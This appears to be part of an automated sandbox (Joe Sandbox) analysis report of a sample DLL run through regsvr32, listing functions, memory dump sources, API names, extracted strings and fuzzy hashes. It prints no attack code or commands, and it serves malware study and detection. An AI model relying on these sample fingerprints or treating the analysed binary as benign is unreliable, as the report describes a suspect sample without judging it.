                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextFileModuleName
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2731829486-0
                                                                                                                                                                                    • Opcode ID: 72d68397ff5999bac4f05581ecf67c2f6a0cb7cb6ed2633dd248dd0b9a721e91
                                                                                                                                                                                    • Instruction ID: 1e6b99b5e57517ac92b29ef44594e441f7b6e1da9e928c969eb0052175030eb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 72d68397ff5999bac4f05581ecf67c2f6a0cb7cb6ed2633dd248dd0b9a721e91
                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A014031214A8885F7A7A750E4953EA6391FB8C386F408129FA8E467E6DF3CC60C8711
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002B35C Relevance: 1.5, APIs: 1, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                                    • Opcode ID: 8d8fd3ade6f0f9f3fd9080fbf3f335f760f3d0c649edeb92a1d081681401aa28
                                                                                                                                                                                    • Instruction ID: 0eeeee1544d46cd204e45caac0c79f22035cc7120e07997e90bc5fab6c158f3f
                                                                                                                                                                                    • Opcode Fuzzy Hash: 8d8fd3ade6f0f9f3fd9080fbf3f335f760f3d0c649edeb92a1d081681401aa28
                                                                                                                                                                                    • Instruction Fuzzy Hash: E3E06D71208E8881F7B3D720E4623DA2790A79C7D9F804212FA8D476E5DE6CC349CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000BE00 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Version
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                                    • Opcode ID: 2c04419eb05166b5f4f85679e30e22623789b06cff4f49493151306d1dc82ed2
                                                                                                                                                                                    • Instruction ID: 5175f68cf667f3bbd6f17a41ff7102f36e9c0a623622d14ca79f504bbdcd64e9
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c04419eb05166b5f4f85679e30e22623789b06cff4f49493151306d1dc82ed2
                                                                                                                                                                                    • Instruction Fuzzy Hash: F1E0C03661494485F7B19B21E4657EAB2A0FB9C784F814115A64D46655DF3CC209CB10
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000B1D4 Relevance: 59.8, APIs: 2, Strings: 32, Instructions: 339windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                                    • String ID: Aramia 0.5$Asia$Atlanta$Beer$Boston$Brand $Bratislava$Brussels$Canada$Chicago$Edinburgh$Europe$Germany$Interbrew$Israel$Karlovacko 0.5$Lisbon$London$Lowenbrau 0.5$Madrid$Milk$New York$North America$Oil$Prague$Russia$San Francisco$Spoon$Stella 0.5$Tnuva 1L$USA$Zagreb
                                                                                                                                                                                    • API String ID: 3850602802-2008252019
                                                                                                                                                                                    • Opcode ID: 208844bb4d3a3c1be25018fb496238dbee32402cb8d9da2cfe9f45a8251ae537
                                                                                                                                                                                    • Instruction ID: aa18ba9f9e216b8bde50958da2e58d8e3178a70db7ec4675ea3b12c79f47abf0
                                                                                                                                                                                    • Opcode Fuzzy Hash: 208844bb4d3a3c1be25018fb496238dbee32402cb8d9da2cfe9f45a8251ae537
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0E10176310A4C95EAA2EB1AE441BDA3750F78DBD8F81E605BD16A7796CE38C30DC700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018002A314 Relevance: 53.8, APIs: 43, Instructions: 94COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1012874770-0
                                                                                                                                                                                    • Opcode ID: bb577b9a85017cb3719ed48e79c78b994302a88abbd5bafe51c7ea618849b3c6
                                                                                                                                                                                    • Instruction ID: 4996f8a5240b550789660274a8bd48bfb1e45240b7beb4869c177c223dfdbaa6
                                                                                                                                                                                    • Opcode Fuzzy Hash: bb577b9a85017cb3719ed48e79c78b994302a88abbd5bafe51c7ea618849b3c6
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2441653221264882EA97FB75C4513ED1326ABC8B84F149131F94F5B5A7CF20CB598390
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800023BC Relevance: 42.3, APIs: 23, Strings: 1, Instructions: 291windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Rect$Color$DrawInflate$FillFrameText$ObjectSelect$BrushControlCopyCreateEdgeFocusPixelSolid
                                                                                                                                                                                    • String ID: $
                                                                                                                                                                                    • API String ID: 2391710194-3993045852
                                                                                                                                                                                    • Opcode ID: ac93f53a741285ee5d4aeb4793193632024ac27a05f151434f4d9c5ab7201152
                                                                                                                                                                                    • Instruction ID: 01e0fdf4ac9835bfedb3c7f8d1b51dfbf26cc145f0b8c1af512df1e92cb0b956
                                                                                                                                                                                    • Opcode Fuzzy Hash: ac93f53a741285ee5d4aeb4793193632024ac27a05f151434f4d9c5ab7201152
                                                                                                                                                                                    • Instruction Fuzzy Hash: 77D18E32204A4997EB92DF25E8813DA7371F78DBC5F459121FA5A43AA5DF38DA0DCB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180029604 Relevance: 36.9, APIs: 15, Strings: 6, Instructions: 130libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • LoadLibraryA.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029641
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002965D
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029685
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002968E
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296A4
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296AD
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296C3
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296CC
                                                                                                                                                                                    • GetProcAddress.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296EA
                                                                                                                                                                                    • EncodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800296F3
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029725
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 0000000180029734
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 000000018002978C
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800297AC
                                                                                                                                                                                    • DecodePointer.KERNEL32(?,?,?,00000000,?,000000FC,00000001,0000000180025BE8,?,?,?,?,?,0000000180025C7C), ref: 00000001800297C5
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                                                                                    • API String ID: 3085332118-232180764
                                                                                                                                                                                    • Opcode ID: c7431dbc0c1d9ecc42898ac9b1de424e3355dc3a19de42d0dfe615159c8f1bca
                                                                                                                                                                                    • Instruction ID: 34437edd36ee9e0989787195d817373b6374099aa32c90939d12c7001ff68dab
                                                                                                                                                                                    • Opcode Fuzzy Hash: c7431dbc0c1d9ecc42898ac9b1de424e3355dc3a19de42d0dfe615159c8f1bca
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3651033021AB0990FED7EFA2A8553E963906F8DBC5F49C525BC0A03791EE38C74DA350
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800114F4 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 185COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Long$Class$HookPropWindow$AtomCallErrorGlobalLastNameNext$CompareInfoStringUnhookWindows
                                                                                                                                                                                    • String ID: #32768$AfxOldWndProc423$ime
                                                                                                                                                                                    • API String ID: 2638390148-4034971020
                                                                                                                                                                                    • Opcode ID: 12fb68ecc60adf1877923a5c0fe178f2f5aedfc8ddaf6fc6b32af8699cbb9fa1
                                                                                                                                                                                    • Instruction ID: 02208ee694169da27692b317166679a7945b06398869ecaf0239ef4c20c25a76
                                                                                                                                                                                    • Opcode Fuzzy Hash: 12fb68ecc60adf1877923a5c0fe178f2f5aedfc8ddaf6fc6b32af8699cbb9fa1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1C717532604E888AEBA79F15E8417EA3361BB8DBD5F498121FD5A177E5CF38C649C300
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000BE60 Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 73libraryloaderCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                                    • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                                                                    • API String ID: 667068680-68207542
                                                                                                                                                                                    • Opcode ID: 4713852c4557f625c8d7565be3f179c50b0928aeb3ff9648270c5aa5b5c9611a
                                                                                                                                                                                    • Instruction ID: 8deb09193d376067e18dbf9bfd0050fd8e78e2f7df0430bd40db9a31185d2816
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4713852c4557f625c8d7565be3f179c50b0928aeb3ff9648270c5aa5b5c9611a
                                                                                                                                                                                    • Instruction Fuzzy Hash: ED319F75A05B4E81EA82DB04F9C43F533A5E70D7D9F46C829A98943320EF78429C8B15
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 00000001800242C8 Relevance: 26.6, APIs: 11, Strings: 4, Instructions: 337COMMONLIBRARYCODE
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd$BlockUnwind$BaseEntryExceptionFunctionImageLookupRaiseThrow
                                                                                                                                                                                    • String ID: bad exception$csm$csm$csm
                                                                                                                                                                                    • API String ID: 2351602029-820278400
                                                                                                                                                                                    • Opcode ID: 059cdec533e8a3316add5beaa7302532266bd107d7566b7a8481e6d0d3181a8f
                                                                                                                                                                                    • Instruction ID: 1ababa2a4d594116706e3837d9c9b6ee6a67532c01c0d1aec0ef550336020ec7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 059cdec533e8a3316add5beaa7302532266bd107d7566b7a8481e6d0d3181a8f
                                                                                                                                                                                    • Instruction Fuzzy Hash: 7BE19273204A8886DAB3EF25A0413ED67A4F7597C4F44C525FE990BB96CF38C699C701
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018000EB98 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 156windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: RectWindow$ClientCopyLongParent$MessagePointsSend
                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                    • API String ID: 2719113648-3887548279
                                                                                                                                                                                    • Opcode ID: 4323494541abe2e925520ec77bf9b03878c3640abc804f14a7688ed33ea0d74f
                                                                                                                                                                                    • Instruction ID: b70a0e5a3b35093f1dc4838cf6f2da899779a35083040c1adacc8837205307eb
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4323494541abe2e925520ec77bf9b03878c3640abc804f14a7688ed33ea0d74f
                                                                                                                                                                                    • Instruction Fuzzy Hash: F561943231868987EB95CB25E54479EB7B1F78DBC1F588021FB4A43B48DF79DA098B00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 000000018001711C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 121libraryloaderregistryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: AddressProc$CloseHandleModuleOpenQueryValue
                                                                                                                                                                                    • String ID: ActivateActCtx$CreateActCtxA$DeactivateActCtx$KERNEL32$ReleaseActCtx
                                                                                                                                                                                    • API String ID: 380410164-3617302793
                                                                                                                                                                                    • Opcode ID: d2e83d71bbf2ddd168d75f634448deb0729e88365b38b5cde735c49250c2094b
                                                                                                                                                                                    • Instruction ID: de56255bdfed1b31624be8c3ac4217a3ab46b7b30178a0990ea0192334bf7d7a
                                                                                                                                                                                    • Opcode Fuzzy Hash: d2e83d71bbf2ddd168d75f634448deb0729e88365b38b5cde735c49250c2094b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 56515872201F4886FBA68B54E8843DA73A0F75C7D9F128525FA4C426A6DF7CC68DC700
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180023AA8 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 95COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296953686.000000018004A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_6_2_180000000_regsvr32.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _getptd$CreateFrameInfo
                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                    • API String ID: 4181383844-1018135373
                                                                                                                                                                                    • Opcode ID: 277d6ecbfe260b60cf314e284520aafbac91a01f2e982eecdabe551723416719
                                                                                                                                                                                    • Instruction ID: 9eccc25229236da607564f4d9f0b1b8304b780951be675bf39de0ed6b0ce1da4
                                                                                                                                                                                    • Opcode Fuzzy Hash: 277d6ecbfe260b60cf314e284520aafbac91a01f2e982eecdabe551723416719
                                                                                                                                                                                    • Instruction Fuzzy Hash: F0413C32240B8982DAA2DF15E4467EE77A4F389BD0F558125EE9D17B96DF34C298CB00
                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                    Function 0000000180023420 Relevance: 18.1, APIs: 12, Instructions: 82COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000006.00000002.296800838.0000000180001000.00000020.00000001.01000000.00000007.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                    • Associated: 00000006.00000002.296796636.0000000180000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296921774.0000000180031000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296936504.0000000180041000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000006.00000002.296944170.0000000180046000.00000004.00000001.01000000.00000007.sdmpDownload File
